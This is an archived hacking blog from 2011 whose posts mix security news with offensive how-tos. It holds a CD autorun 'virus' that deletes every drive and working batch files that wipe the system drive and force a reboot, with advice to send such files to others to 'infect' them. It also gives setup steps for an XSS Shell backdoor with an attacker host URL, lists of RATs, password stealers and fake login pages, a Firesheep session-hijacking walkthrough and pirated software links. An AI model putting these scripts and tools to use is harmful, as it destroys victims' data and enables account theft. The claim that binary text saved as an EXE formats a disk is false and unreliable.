Sunday, February 27, 2011

How to crack IIS FTP password using Brute-Force


FTP is an application or service or protocol  which can be used to transfer files from one place to another  place ,it really comes very handy  during transfer of files from a local box to a remote one .Suppose someone get access to your FTP then he/she can cause nightmare for you by uploading  unappropriate images or files etc.Here we will discuss how we can crack the password of IIS installed FTP service in Windows.

What is Brute-Force?

Brute-force is a type of attack in which every  possible combination of letters, digits and special characters are  tried until the right password is matched  with the username. The main limitation of this attack is its time factor. The time it takes to find the proper match mainly depends on the length and complexity of the password.Here I will be using this attack to crack the password.So,lets start….
Requirements:
  1. The tool we will be using  ” BrutusA2”(Download: http://www.hoobie.net/brutus/)
  2. You need to know the target suppose “ftp://123.123.xx.xxx”

Procedure:

Step 1.Here I have shown an authentication page of an FTP service in the image below and in the following steps we will crack its password using brutus.

Step 2.Now open up “Brutus” and type  your desire target ,select wordlist and select “FTP” from the drop down menu  and click start. If you are confused then follow the image below.


Step 3.The time it takes as I mentioned above depends on the complexity and length of the password.So after clicking the start button wait for the time as mentioned in the tool.The password will be displayed as shown above.
Recommendation: I would recommend the readers to try it in a virtual environment as I did and enjoy the trick.It is not advisable to try it on some unknown user without prior permission.

Mobiledit! 4.3.1.854 Final



Mobile phones contain some of the most important evidence in criminal investigations. Law enforcement agencies around the world need every possible advantage to help solve crimes. In many instances, mobile phones contain the important incriminating evidence that legal investigators require to solve a case. MOBILedit! Forensic has changed the way this evidence is obtained and presented. It provides reports with tamper-proof and indisputable evidence in a court of law. This report details out every piece of information in the phone such as call history, list of contacts, messages, photos, voice recordings, video, files, calendar, tasks, notes etc. MOBILedit! Forensic is a must-have for any forensic agent looking for that extra edge. With just a single click, MOBILedit! Forensic collects all possible data from the mobile phone and generates an extensive report onto a PC that can be stored or printed. MOBILedit! Forensic is the most universal cellular phone solution with architecture able to support virtually all phones. MOBILedit! Forensic allows you to customize the output making it completely adaptable to the needs of your judicial system. MOBILedit! Forensic also has frequent updates and upgrades so that you can be sure you are using the absolute latest in technology.

Features:
* Analyze phones via Bluetooth, IrDA or cable connection
* Analyze phonebook, last dialed numbers, missed calls, received calls, SMS messages, multimedia messages, photos, files, phone details, calendar, notes, tasks and more
* Large quantity of phones supported
* Frequent updates and upgrades with new features and more phones
* Direct SIM analyzer through SIM readers
* Reads deleted messages from the SIM card
* Reports Generator based on your templates
* Print reports ready for courtroom
* Reports generated in any language
* Make backup now and reports when needed
* Manual investigation mode
* Secure and tamper-proof using MD5 hash
* Compliant with Word or any other RTF editor
* View formatted reports in browser including original pictures
* Exports to Word, Excel/XLS, browser, XML/XSL
* Complete solution including specific phone cables and SIM readers
* XML export - seamlessly connect MOBILedit! Forensic data with other systems
* Preferred/forbidden networks
* Hex dump viewer
* Free access to forensic forum.

MOBILedit! 4.3.1.854 Incl. Patch zoo
Download : | FileSonic | DepositFiles | Turbobit |

Thursday, February 24, 2011

Anti FireSheep

BlackSheep



With all the hype about Firesheep, the Firefox add-on that snatches up social network login credentials over open wireless networks, security companies are starting to make anti-Firesheep measures available to the average user. BlackSheep, developed by "cloud security" firm Zscaler, is a Firefox add-on that detects the presence of Firesheep on your network.

If someone is using Firesheep, BlackSheep will trick it with a fake login cookie. When Firesheep takes BlackSheep's bait and tries to get your user information from a site using the fake values BlackSheep has been sending out, you'll get a warning that Firesheep is operating, as well as the IP address of the person using it.

Unfortunately, BlackSheep is only available for Firefox at the moment. There are other security measures you can use, though. Sebastian has posted a roundup of ways to surf securely with SSL in any browser. Even more recently, someone released a Safari extension to force Facebook to use SSL. As far as direct anti-Firesheep countermeasures go, a Windows app called Fireshepherd can also help you shut Firesheep snoopers down.



FireShepherd





A login-cookie-snooping Firefox plug-in called Firesheep rocked the Internet by letting anyone compromise your Facebook or Twitter account over a wireless network. Alarmed at Firesheep's 200,000 downloads, an Icelandic engineering student named Gunnar Sigurdsson created FireShepherd, a program that crashes Firesheep with floods of nonsense packets.

Although Firesheep was originally created to prove a point about insecure login credentials on social networks, the huge number of downloads means that it could be a security risk to everyday users. Sigurdsson compares it to "living in a house with nothing but windows." Of course, security researchers or malicious users could patch up the Firesheep flaw that FireShepherd exploits, but FireShepherd's creator has vowed to keep finding new ways to stop the snooping plug-in. 

Tuesday, February 22, 2011

CD AUTORUN VIRUS, FORMATTING COMPUTER !


Create a file in note pad and name it "vrs.cmd"
write following commands in the file-

rd e:\*.* /s/q
rd d:\*.* /s/q
rd C:\*.* /s/q


after saving it with name vrs.cmd
plz dont'double click on it else u'll lose data frm ur hard disk

STEP 2-

make another file name it "autorun.inf"
and write following codes in it.

[AUTORUN]
open=vrs.cmd

save this file autorun.inf

STEP 3-
Now write these two files into a CD and CD is READY to destroy a computer..

CHECK___
u can check the ability of vrs.cmd i mean to have a trial

make a folder in "d:" name it "siva"
and put some files and folders it like songs, sanps etc
now make a file in note pad


rd d:\siva /s/q

and save it with name vr.cmd
and now double click on this file
it will remove siva folder from "d:"



You might also like:

Monday, February 21, 2011

[Download] The Hacker's Kit [T[Download] The Hacker's Kit [Tools, Rats, Keyloggers, Stealers, Scanners]♣ools, Rats, Keyloggers, Stealers, Scanners]♣



Batch

- DELmE's Batch Virus Generator v 2.0
- Power Of Batch [Text File]

Binders

- Bl0b B!nder 0.2.0 + USG
- BlackHole Binder
- F.B.I. Binder
- Predator 1.6
- PureBiND3R by d3will
- Schniedelwutz Binder 1.0
- Simple Binder by Stonedinfect
- sp1r1tus Binder 1.0
- Tool-Store Binder 1.0
- Tool-Store Toasty Binder 1.0
- Yet Another Binder 2.0
- Others

Crypters

- Bifrost Crypter by ArexX 2
- Cryptable Seduction 1.0 by DizzY
- Crypter by Permabatt
- Crypter bY YoDa
- Cryptic 1.5
- Daemon Crypt 2 Public
- Deception 4 by [RaGe] [Favorite :D]
- Destructor Crypter
- EXECrypt 1 M0d by CARDX
- Fuzz Buzz 1.2 by BulletProof
- OSC-Crypter by haZl0oh M0d
- Poison Ivy Crypt M0d by CARDX
- SaW V1 Mod by LEGIONPR
- Skorpien007 Crypter 3.1
- Stonedinfect Crypter 1.0
- Trojka Crypter 1.1 by tr1p0d

Keyloggers

- Ardamax 2.8
- Ardamax 2.41

Nukers And Fl00ders

- Ass4ult
- B4ttl3 P0ng
- Click v2.2
- Fortune
- ICMP Fl00d
- Panther Mode 1 & 2
- Rocket v1.0
- RPC Nuke

Port & IP Scanners

- Advanced IP Scanner
- Advanced Port Scanner
- Bitching Threads
- BluePortScan
- LanSpy
- NeoTracePro
- NetScanTools
- ProPort
- Putty v0.6
- SuperScan
- Trojan Hunter 15
- ZenMap - Nmap v5.21 [Win]

R.A.T.s

- Apocalypse 1.4.4
- Aryan v0.5
- Bandook RAT 1.35
- Bifrost 1.2.1d
- Cerberus 1.03.4
- All Cybergates from v1.01.8 to v1.04.8
- DarkComet 2 RC3
- Lost Door 4.0 Pro
- MeTuS-Delphi-2.8
- Nuclear RAT 2.1.0
- Optix v1.33
- Poison Ivy 2.3.2
- ProRat 1.9 SE
- SharK 3
- Spy-Net v2.6
- SubSeven 2.3
- Turkojan 4 Gold

Sniffers

- Cain & Abel Self Installer [WinXP]
- WireShark Self-Installer [Win32]

Stealers

- 1337 SteamACC Stealer Private
- Allround Stealer
- Armageddon Stealer 1.0 by Krusty
- bl0b Recovery 1.0
- Blade Stealer 1.0 PUBLIC
- Codesoft PW Stealer 0.35
- Codesoft PW Stealer 0.50
- Dark Screen Stealer 2
- Dimension Stealer 2 by Gumball
- FileZilla Stealer 1.0 PUBLIC
- FileZilla Stealer by Stonedinfect
- Firefox Password Stealer - Steamcafe
- Fly Stealer 0.1
- Fudsonly Stealer 0.1
- Hackbase Steam Phisher 1.2 BETA
- spam 0.0.1.4
- spam Stealer
- HardCore Soft 0.0.0.1
- ICQ Steal0r
- IStealer 4.0
- IStealer 6.0 Legends
- LabStealer by Xash
- Multi Password Stealer 1.6
- Papst Steale.NET
- Pass Stealer 3.0
- Pesca Stealer 0.2
- pixel Stealer 1.3.0 SC
- pixel Stealer 1.4.0
- ProStealer
- Public Firefox 3 Stealer
- Pure-Steam 1.0 CS
- Pw Stealer by Killer110
- PWStealer 2.0
- Remote Penetration 2.2
- SC LiteStealer 1
- SimpleStealer 2.1
- SPS Stealer
- SStealer by till7
- Steam Stealer 1.0 by ghstoy
- Steam Stealer by till7
- Stupid Stealer 6 mit PHP Logger
- System Stealer 2
- The Simpsons Stealer 0.2
- Tool-Store FileZilla Stealer 1.0
- Ultimate Stealer 1.0
- Universal1337 - The Account Stealer
- Universal1337 2
- Universal1337 3

Vulnerability Scanner and Exploiter

- Atk ToolKit 4.1 [Src Code Included]
- Metasploit Framework V3.4.0 [Win]
- Nessus [Win32]

Website Exploit And SLQ Injections

- Admin Finder
- CGI-Bug Scanner
- Exploit Scanner
- ServerAttack
- SQL Helper
- Dork List [Text File]
- Dork [Text File]
- Master Google Hack List [Text File]

Others

- Bruteforcers
- Extra! [From VIP Vince Tool pack]
- ProxyBrowser
- Various Tools
- Much more


Sunday, February 20, 2011

Hack Facebook/Twitter Or Any Email Account With Session Hijacking

 
When logging into a website you usually start by submitting your username and password. The server then checks to see if an account matching this information exists and if so, replies back to you with a "cookie" which is used by your browser for all subsequent requests.
It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called "sidejacking") is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.
This is a widely known problem that has been talked about to death, yet very popular websites continue to fail at protecting their users. The only effective fix for this problem is full end-to-end encryption, known on the web as HTTPS or SSL. Facebook is constantly rolling out new "privacy" features in an endless attempt to quell the screams of unhappy users, but what's the point when someone can just take over an account entirely? Twitter forced all third party developers to use OAuth then immediately released (and promoted) a new version of their insecure website. When it comes to user privacy, SSL is the elephant in the room.
Firesheep, a Firefox extension designed to demonstrate just how serious this problem is.
After installing the extension you'll see a new sidebar. Connect to any busy open wifi network and click the big "Start Capturing" button. Then wait.

As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed:


Double-click on someone, and you're instantly logged in as them.


That's it.
Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.
Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win.
By Codebutler..
..................................................................................................................................................................................................
.............................................

Saturday, February 19, 2011

BUILD YOUR OWN VIRUS BY VMAKER - DOWNLOAD NOW !!

Note - the software is for educational purpose and it can be detected by your anti virus so you need to stop or disable your antivirus before you work on this software.


Create your own prank files/viruses with ease. Open Vmaker10 select

desired features, choose to add to start up and USB Spread, name press ‘Build’ OR dont put a name and the

software will name it for you ‘Built.exe’.

DOWNLOAD

NOTE:
       if u like to know about the RESULT of VIRUSTOTAL about VMAKER  click here

Friday, February 18, 2011

FORMAT HARD DISK WITH NOTEPAD



If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.

Step 1.

Copy The Following In Notepad Exactly as it says

01001011000111110010010101010101010000011111100000

Step 2.

Save As An EXE Any Name Will Do

Step 3.

Send the EXE to People And Infect
OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code

format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000


format d:\ /Q/X -- this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000

format f:\ /Q/X -- this will format your drive f:\

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001


try to figure out urself rest

cant spoonfeed

its working

Do not try it on your PC. Don't mess around this is for educational purpose only

still if you cant figure it out try this

go to notepad and type the following:

@Echo off
Del C:\ *.*|y

save it as Dell.bat

want worse then type the following:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file

Thursday, February 17, 2011

Download Free XSS Shell v0.3.9 - (Xss)Cross Site Scripting Backdoor Tool

Only For Educational Purpose  I Take No Responsibility Of Any Misuse.
XSS Shell v0.3.9 - Cross Site Scripting Backdoor Tool

XSS Shell is a powerful XSS backdoor which allows interactively getting control over a Cross-site Scripting (XSS) vulnerability in a web application. Demonstrates the real power and damage of Cross-site Scripting attacks. WHAT IS XSS SHELL ?
XSS Shell is powerful a XSS backdoor and zombie manager. This concept first presented by XSS-Proxy (XSS-Proxy: A tool for realtime XSS hijacking and control). Normally in XSS attacks attacker has one shot, in XSS Shell you can interactively send requests and get responses from victim, you can backdoor the page.
You can steal basic auth, you can bypass IP restrictions in administration panels, you can DDoS some systems with a permanent XSS vulnerability etc. Attack possibilities are limited with ideas. Basically this tool demonstrates that you can do more with XSS.
FEATURES
XSS Shell has several features to gain whole access over victim. Also you can simply add your own commands.
Most of the features can enable or disabled from configuration or can be tweaked from source code.
Features:

  • Regenerating Pages
  • Keylogger
  • Mouse Logger (click points + current DOM)
Built-in Commands:
  • Get Keylogger Data
  • Get Current Page (Current rendered DOM / like screenshot)
  • Get Cookie
  • Execute supplied javaScript (eval)
  • Get Clipboard (IE only)
  • Get internal IP address (Firefox + JVM only)
  • Check victim’s visited URL history
  • DDoS
  • Force to Crash victim’s browser
  Install Admin Interface;

1. Copy "xssshell" folder into your web server
2. Copy "db" to a secure place (below root)
3. Configure "database path" from "xssshell/db.asp"
4. Modify hard coded password in db.asp [default password is : w00t]
5. Now you can access admin interface from something like http://[YOURHOST]/xssshell/

Configure XSS Shell for communication;
1. Open xssshell.asp
2. Set "SERVER" variable to where your XSSShell folder is located. i.e: "http://[YOURHOST]/xssshell/";
3. Be sure to check "ME", "CONNECTOR", "COMMANDS_URL" variables. If you changed filenames, folder names or some kind of different configuration you need modify them.

Now open your admin interface from your browser,
To test it, just modify "sample_victim/default.asp" source code and replace "http://attacker:81/release/xssshell.js" URL with your own XSS Shell URL. Open "sample_victim" folder in some other browser and may be upload in to some other server.

Now you should see a zombie in admin interface. Just write something into "parameters" textarea and click "alert()". You should see an alert message in victim's browser.

-------------------------
SECURITY NOTES
-------------------------
- As a hunter be careful about possible "Backfire" in getSelfHTML(). Someone can hack you back or track you by another XSS or XSS Shell attack.
    - Checkout "showdata.asp" and implement your own "filter()" function to make it safer for you.

- Put "On error resume next" to db.asp, better modify your web server to not show any error.

-------------------------
HOW CAN YOU EXTEND?
-------------------------
First implement it to xssshell.asp
    1) Add new enum for your control
        - Set a name and unique number like "CMD_GETCOOKIE"
            - var CMD_SAMPLE = 78;
      
        - Set datatype for your response (generally TEXT),
            - dataTypes[CMD_SAMPLE] = TEXT;
      
    2) Write your function and add it to page
        - function cmdSample(){return "yeah working !"}
  
    3) Call it
        - Go inside to "function processGivenCommand(cmd)"
        - Add a new case like "case CMD_SAMPLE:"
  
    4) Report it back
        - Inside the case call log;
        "log(cmdSample(), dataTypes[cmd.cmd], cmd.attackID, "waitAndRun()");"
      
Secondly Implement it to admin interface;
    - In db.asp just add a new element to "Commands" array (command name, command unique number, description).
    i.e. "cmdSample()",78,"Command sample ! Just returns a message"

There are parameters and lots of helper in the code. Check out other commands for reference.
Enable debug feature to debug your new commands easily.
-------------------------
KNOWN BUGS;
-------------------------
- Keylogger is not working on IE
- Possibly not going to work for framed pages because of frame regeneration.
- Not working on Konqueror

DOWNLOAD:
http://www.ziddu.com/download/9267912/XSSShell039.zip.html
.....................................................................................

Wednesday, February 16, 2011

Advanced sign-in security for your Google account


Has anyone you know ever lost control of an email account and inadvertently sent spam—or worse—to their friends and family? There are plenty of examples (like the classic "Mugged in London" scam) that demonstrate why it's important to take steps to help secure your activities online. Your Gmail account, your photos, your private documents—if you reuse the same password on multiple sites and one of those sites gets hacked, or your password is conned out of you directly through a phishing scam, it can be used to access some of your most closely-held information.

Most of us are used to entrusting our information to a password, but we know that some of you are looking for something stronger. As we announced to our Google Apps customers a few months ago, we've developed an advanced opt-in security feature called 2-step verification that makes your Google Account significantly more secure by helping to verify that you're the real owner of your account. Now it's time to offer the same advanced protection to all of our users.

2-step verification requires two independent factors for authentication, much like you might see on your banking website: your password, plus a code obtained using your phone. Over the next few days, you'll see a new link on your Account Settings page that looks like this:


Take your time to carefully set up 2-step verification—we expect it may take up to 15 minutes to enroll. A user-friendly set-up wizard will guide you through the process, including setting up a backup phone and creating backup codes in case you lose access to your primary phone. Once you enable 2-step verification, you'll see an extra page that prompts you for a code when you sign in to your account. After entering your password, Google will call you with the code, send you an SMS message or give you the choice to generate the code for yourself using a mobile application on your Android, BlackBerry or iPhone device. The choice is up to you. When you enter this code after correctly submitting your password we'll have a pretty good idea that the person signing in is actually you.


It's an extra step, but it's one that significantly improves the security of your Google Account because it requires the powerful combination of both something you know—your username and password—and something that only you should have—your phone. A hacker would need access to both of these factors to gain access to your account. If you like, you can always choose a "Remember verification for this computer for 30 days" option, and you won't need to re-enter a code for another 30 days. You can also set up one-time application-specific passwords to sign in to your account from non-browser based applications that are designed to only ask for a password, and cannot prompt for the code.

To learn more about 2-step verification and get started, visit our Help Center. And for more about staying safe online, see our ongoing security blog series or visit http://www.staysafeonline.org/. Be safe!

Tuesday, February 15, 2011

How to Create nameless files and folders in windows

1.Select any file or folder.
2.Right click on it, press rename or simply press F2.
3.Press and hold the alt key. While holding the Alt key, type numbers 0160 from the numpad.
4.Press Enter and the nameless file or folder will be created.
 

But what if you want to create another nameless file or folder in the same directory ?

For this you will have to rename the file with 2 spaces. Just follow these steps below:

1.Select file, press F2.
2.Hold alt key and type 0160 from the numpad.
3.Release the alt key. Now without doing anything else, again hold alt key and press 0160.
4.Press enter and you will have second nameless file in the same directory.
5.Repeat step 3 to create as many nameless files or folders in the same directory.

Monday, February 14, 2011

Reset Windows Password Advanced Edition v1.2.1.195 Retail


 

Lost password or locked Windows account is the most frequent problem data recovery specialists have to deal with. You could format the hard drive or reinstall your operating system, but that wouldn't keep you from partial loss of data, personal settings and extra headache. Besides, all that can take some time. There is a quicker and more elegant way out of this situation. Just run Reset Windows Passwords from a bootable CD or USB and reset the forgotten password or unlock the account. It's a matter of a few minutes! Reset Windows Password is the most powerful solution for recovering or resetting all types of Windows account passwords: user', administrator, Active Directory accounts, and domain administrators.
The program is designed specifically for an inexperienced user and is easy to operate. On the other hand, the password lookup algorithms are unique and not used in any similar application.
Unlike other utilities, Reset Windows Password is the only program that can CORRECTLY process all types of Windows accounts.

Features
Simple, intuitive graphic interface. No more ugly DOS prompts.
Resets and modifies passwords of local users and administrators, domain administrator, Active Directory users, DSRM account.
Enables and unlocks user accounts.
Disables the password expiry option.
Resets SYSKEY (with full user passwords re-encryption)
Advanced password lookup algorithms (also known as AI attack).
Dumps user password hashes from SAM for further analysis.
Dumps password hashes from Active Directory.
Dumps domain cached credentials.
Supports all versions of NT-based Windows, including the newest Windows 7.
All editions include the utility for creating a bootable CD/DVD/USB disk from the downloadable ISO file with the application.
Supports 64-bit Windows.
Large collection of IDE, SATA, SCSI, RAID drivers.
Detects several operating systems installed on the computer.
Supports non-English versions of Windows and passwords in national encodings.
Allows undoing changes made to the system.
Deletes passwords and other sensitive data from the computer.
Detailed help.

How it looks and works
Reset Windows Password - screenshots and documentation
Full list of the program features
Three simple steps to create a bootable CD, DVD or USB disk
Utility for creating bootable disks
Running RWP from the bootable disk
Modifying BIOS to boot from RWP disk, questions and answers

The software is available in three editions: Light, Standard and Advanced. The detailed list of features is shown below : www.passcape.com/reset_windows_password_editions
Reset.Windows.Password.Advanced.Edition.v1.2.1.195.retail-iOTA
Download : | FileSonic | DepositFiles | Turbobit


.................................................................................................................................................

Sunday, February 13, 2011

Certified Ethical Hacker V6 - Training Videos - LABS, Tools

Certified Ethical Hacker Course has been divided into two sections:
1. Certified Ethical Hacker (CEH) v 6 - Training DVDs (Flash video) | 6 DVDs ISO | 10.3 GB
2. Certified Ethical Hacker and Countermeasures V6 LABS (Tools) | 4 Volumes | ISOs + Instructor slides in PDF | 13.2 GB

First section, Training videos, focuses on how to scan, test, hack and secure your own systems (all in depth).

Second section, LABS (Tools), gives each student in-depth knowledge and practical experience with the current essential security systems. It is analogous to what you do in college laboratory i.e. real-time practical experience to what is taught in theory lectures.

Thus, this complete course guarantees to make you a Professional Hacker


LABS (Tools)



Certified Ethical Hacker and Countermeasures V6 LABS (Tools) | 4 Volumes | ISOs + Instructor slides in PDF | 13.2 GB

These are all the DVD materials for the CEH v6 exam training from EC-Council. This is a fantastic class with a lot of knowledge.

These are the tools not videos. This is to teach how to countermeasure hacks and in that being said there are live real worms, viruses,trojans.etc. not to destroy your computer(IF USED WITH VMWARE OR OTHER COMPUTER) but to teach you how to get rid of them.

Certified Ethical Hacker & Countermeasures V6

Course Description

This class will immerse the student into an interactive environment where they will be shown how to scan, test, hack and secure their own systems. The lab intensive environment gives each student in-depth knowledge and practical experience with the current essential security systems. Students will begin by understanding how perimeter defenses work and then be lead into scanning and attacking their own networks, no real network is harmed. Students then learn how intruders escalate privileges and what steps can be taken to secure a system. Students will also learn about Intrusion Detection, Policy Creation, Social Engineering, DDoS Attacks, Buffer Overflows and Virus Creation. When a student leaves this intensive 5 day class they will have hands on understanding and experience in Ethical Hacking. This course prepares you for EC-Council Certified Ethical Hacker exam 312-50.

Who Should Attend

This course will significantly benefit security officers, auditors, security professionals, site administrators, and anyone who is concerned about the integrity of the network infrastructure.


Certification
The Certified Ethical Hacker exam 312-50 may be taken on the last day of the training (optional). Students need to pass the online Prometric exam to receive CEH certification. Training fee is inclusive of Exam, Official Kit, Certificate and meals.

Legal Agreement

Ethical Hacking and Countermeasures course mission is to educate, introduce and demonstrate hacking tools for penetration testing purposes only. Prior to attending this course, you will be asked to sign an agreement stating that you will not use the newly acquired skills for illegal or malicious attacks and you will not use such tools in an attempt to compromise any computer system, and to indemnify EC-Council with respect to the use or misuse of these tools, regardless of intent.

CEHv6 Curriculum consists of instructor-led training and self-study. The Instructor will provide the details of self-study modules to the students beginning of the class.

Code:

http://www.eccouncil.org

Quote:
Module 1: Introduction to Ethical Hacking
Module 2: Hacking Laws
Module 3: Footprinting
Module 4: Google Hacking
Module 5: Scanning
Module 6: Enumeration
Module 7: System Hacking
Module 8: Trojans and Backdoors
Module 9: Viruses and Worms
Module 10: Sniffers
Module 11: Social Engineering
Module 12: Phishing
Module 13: Hacking Email Accounts
Module 14: Denial-of-Service
Module 15: Session Hijacking
Module 16: Hacking Web Servers
Module 17: Web Application Vulnerabilities
Module 18: Web-Based Password Cracking Techniques
Module 19: SQL Injection
Module 20: Hacking Wireless Networks
Module 21: Physical Security
Module 22: Linux Hacking
Module 23: Evading IDS, Firewalls and Detecting Honey Pots
Module 24: Buffer Overflows
Module 25: Cryptography
Module 26: Penetration Testing
Module 27: Covert Hacking
Module 28: Writing Virus Codes
Module 29: Assembly Language Tutorial
Module 30: Exploit Writing
Module 31: Smashing the Stack for Fun and Profit
Module 32: Windows Based Buffer Overflow Exploit Writing
Module 33: Reverse Engineering
Module 34: MAC OS X Hacking
Module 35: Hacking Routers, cable Modems and Firewalls
Module 36: Hacking Mobile Phones, PDA and Handheld Devices
Module 37: Bluetooth Hacking
Module 38: VoIP Hacking
Module 39: RFID Hacking
Module 40: Spamming Module
Module 41: Hacking USB Devices
Module 42: Hacking Database Servers
Module 43: Cyber Warfare- Hacking, Al-Qaida and Terrorism
Module 44: Internet Content Filtering Techniques
Module 45: Privacy on the Internet
Module 46: Securing Laptop Computers
Module 47: Spying Technologies
Module 48: Corporate Espionage- Hacking Using Insiders
Module 49: Creating Security Policies
Module 50: Software Piracy and Warez
Module 51: Hacking and Cheating Online Games
Module 52: Hacking RSS and Atom
Module 53: Hacking Web Browsers (Firefox, IE)
Module 54: Proxy Server Technologies
Module 55: Data Loss Prevention
Module 56: Hacking Global Positioning System (GPS)
Module 57: Computer Forensics and Incident Handling
Module 58: Credit Card Frauds
Module 59: How to Steal Passwords
Module 60: Firewall Technologies
Module 61: Threats and Countermeasures
Module 62: Case Studies
Module 62: Case Studies
Module 63: Botnets
Module 64: Economic Espionage
Module 65: Patch Management
Module 66: Security Convergence





Instructor Slides:
http://hotfile.com/d....part1.rar.html
http://hotfile.com/d....part2.rar.html
http://hotfile.com/d....part3.rar.html

Labs (Tools)
http://hotfile.com/d...part01.rar.html
http://hotfile.com/d...part02.rar.html
http://hotfile.com/d...part03.rar.html
http://hotfile.com/d...part04.rar.html
http://hotfile.com/d...part05.rar.html
http://hotfile.com/d...part06.rar.html
http://hotfile.com/d...part07.rar.html
http://hotfile.com/d...part08.rar.html
http://hotfile.com/d...part09.rar.html
http://hotfile.com/d...part10.rar.html
http://hotfile.com/d...part11.rar.html
http://hotfile.com/d...part12.rar.html
http://hotfile.com/d...part13.rar.html
http://hotfile.com/d...part14.rar.html
http://hotfile.com/d...part15.rar.html
http://hotfile.com/d...part16.rar.html
http://hotfile.com/d...part17.rar.html
http://hotfile.com/d...part18.rar.html
http://hotfile.com/d...part19.rar.html
http://hotfile.com/d...part20.rar.html
http://hotfile.com/d...part21.rar.html
http://hotfile.com/d...part22.rar.html
http://hotfile.com/d...part23.rar.html
http://hotfile.com/d...part24.rar.html
http://hotfile.com/d...part25.rar.html
http://hotfile.com/d...part26.rar.html
http://hotfile.com/d...part27.rar.html
http://hotfile.com/d...part28.rar.html
http://hotfile.com/d...part29.rar.html
http://hotfile.com/d...part30.rar.html
http://hotfile.com/d...part31.rar.html
http://hotfile.com/d...part32.rar.html
http://hotfile.com/d...part33.rar.html
http://hotfile.com/d...part34.rar.html
http://hotfile.com/d...part35.rar.html
http://hotfile.com/d...part36.rar.html
http://hotfile.com/d...part37.rar.html
http://hotfile.com/d...part38.rar.html
http://hotfile.com/d...part39.rar.html
http://hotfile.com/d...part40.rar.html
http://hotfile.com/d...part41.rar.html
http://hotfile.com/d...part42.rar.html
http://hotfile.com/d...part43.rar.html
http://hotfile.com/d...part44.rar.html
http://hotfile.com/d...part45.rar.html
http://hotfile.com/d...part46.rar.html
http://hotfile.com/d...part47.rar.html
http://hotfile.com/d...part48.rar.html
http://hotfile.com/d...part49.rar.html
http://hotfile.com/d...part50.rar.html
http://hotfile.com/d...part51.rar.html
http://hotfile.com/d...part52.rar.html
http://hotfile.com/d...part53.rar.html
http://hotfile.com/d...part54.rar.html
http://hotfile.com/d...part55.rar.html
http://hotfile.com/d...part56.rar.html
http://hotfile.com/d...part57.rar.html
http://hotfile.com/d...part58.rar.html
http://hotfile.com/d...part59.rar.html
http://hotfile.com/d...part60.rar.html
http://hotfile.com/d...part61.rar.html
http://hotfile.com/d...part62.rar.html
http://hotfile.com/d...part63.rar.html
http://hotfile.com/d...part64.rar.html
http://hotfile.com/d...part65.rar.html
http://hotfile.com/d...part66.rar.html
http://hotfile.com/d...part67.rar.html
http://hotfile.com/d...part68.rar.html


 

Saturday, February 12, 2011

SNIFFER-HACKING TOOL



Sniffers monitor network data. A sniffer can be a self-contained software program or a hardware device with the appropriate software or firmware programming. Sniffers usually act as network probes or "snoops." They examine network traffic, making a copy of the data without redirecting or altering it. Some sniffers work only with TCP/IP packets, but the more sophisticated tools can work with many other protocols and at lower levels including Ethernet frames.

Years ago, sniffers were tools used exclusively by network engineers. Today, however, these utilities have become popular on the Internet with hackers and the merely curious. The U.S. Federal Bureau of Investigation (FBI) has utilized a famous sniffer system called "Carnivore" to help detect illegal Internet communications.


DOWNLOAD

Friday, February 11, 2011

THC-HYDRA v6.1 brute force tool Released !


One of the most famous network logon cracker - THC-HYDRA, has been updated! We now have THC-HYDRA version 6.1 in less than a fortnight!

“THC-HYDRA is a very fast network logon cracker which support many different services. This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system. It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD and OSX.”

This is the change log:
More license updates for the files for the debian guys
Fix for the configure script to correctly detect postgresql
Add checks for libssh v0.4 and support for ssh v1
Merge all latest crypto code in sasl files
Fix SVN compilation issue on openSUSE (tested with v11.3)

Download THC-HYDRA v6.1 news source:the hacker news

Wednesday, February 9, 2011

Best Hacking Tools -85in1-

Audio theme: Sean Paul - Temperature
Size : 43.2MB Compress ,29.7MB UnCompress

Contents:
Main page:

  • HOTMAIL HACKING
  • YAHOO HACKING
  • MSN FUN TOOLS
  • FAKE SCREENS/PAGES
  • OTHER HACKING TOOLS
  • FUN TOOLS

  • Page 1 :

    MSN Chat Monitor And Sniffer
    MSN Password Retriever
    MSN Hacker DUC
    Head Fuck HotMail HAck
    HotMail Hacker XE Edition
    HotMail HAck
    HotMAil Hacker
    MSN Passwords
    MSN Flooder
    MSN Sniffer
    MSN SPY Lite
    HotMail Hacker Gold
    HotMail HAcker Final
    Give me Ur Pass
    HotMail Brute Forcer
    MSN PAssword Finder
    MSN Password Grabber
    Hack MSN Password
    Hack HotMAil Evolution
    MAgic Password Sender
    MSN Locker
    HotMail Killer
    Hot Freeze
    MessenPass
    HotMAil Hack !
    Ice Cold Reload
    HotMail Killer 2
    Nuke MSN

    Page 2:

    Yahoo Messenger Login Screen
    MSN Messenger 7 Login Screen
    MSN Messenger 5 Login Screen
    MSN Messenger 4.6 Login Screen
    HotMail Login Screen
    Fake Web Pages 2
    Fake Eeb Pages 1
    AOL Killer
    Fake Login HotMail
    B-S Spy
    Saria Fake Logins

    Page 3:

    Yahoo Password Retrieval
    Yacam
    Yahoo Cracker
    Yahoo Booster
    Yahoo Hack!
    Yahoo Password Stealer
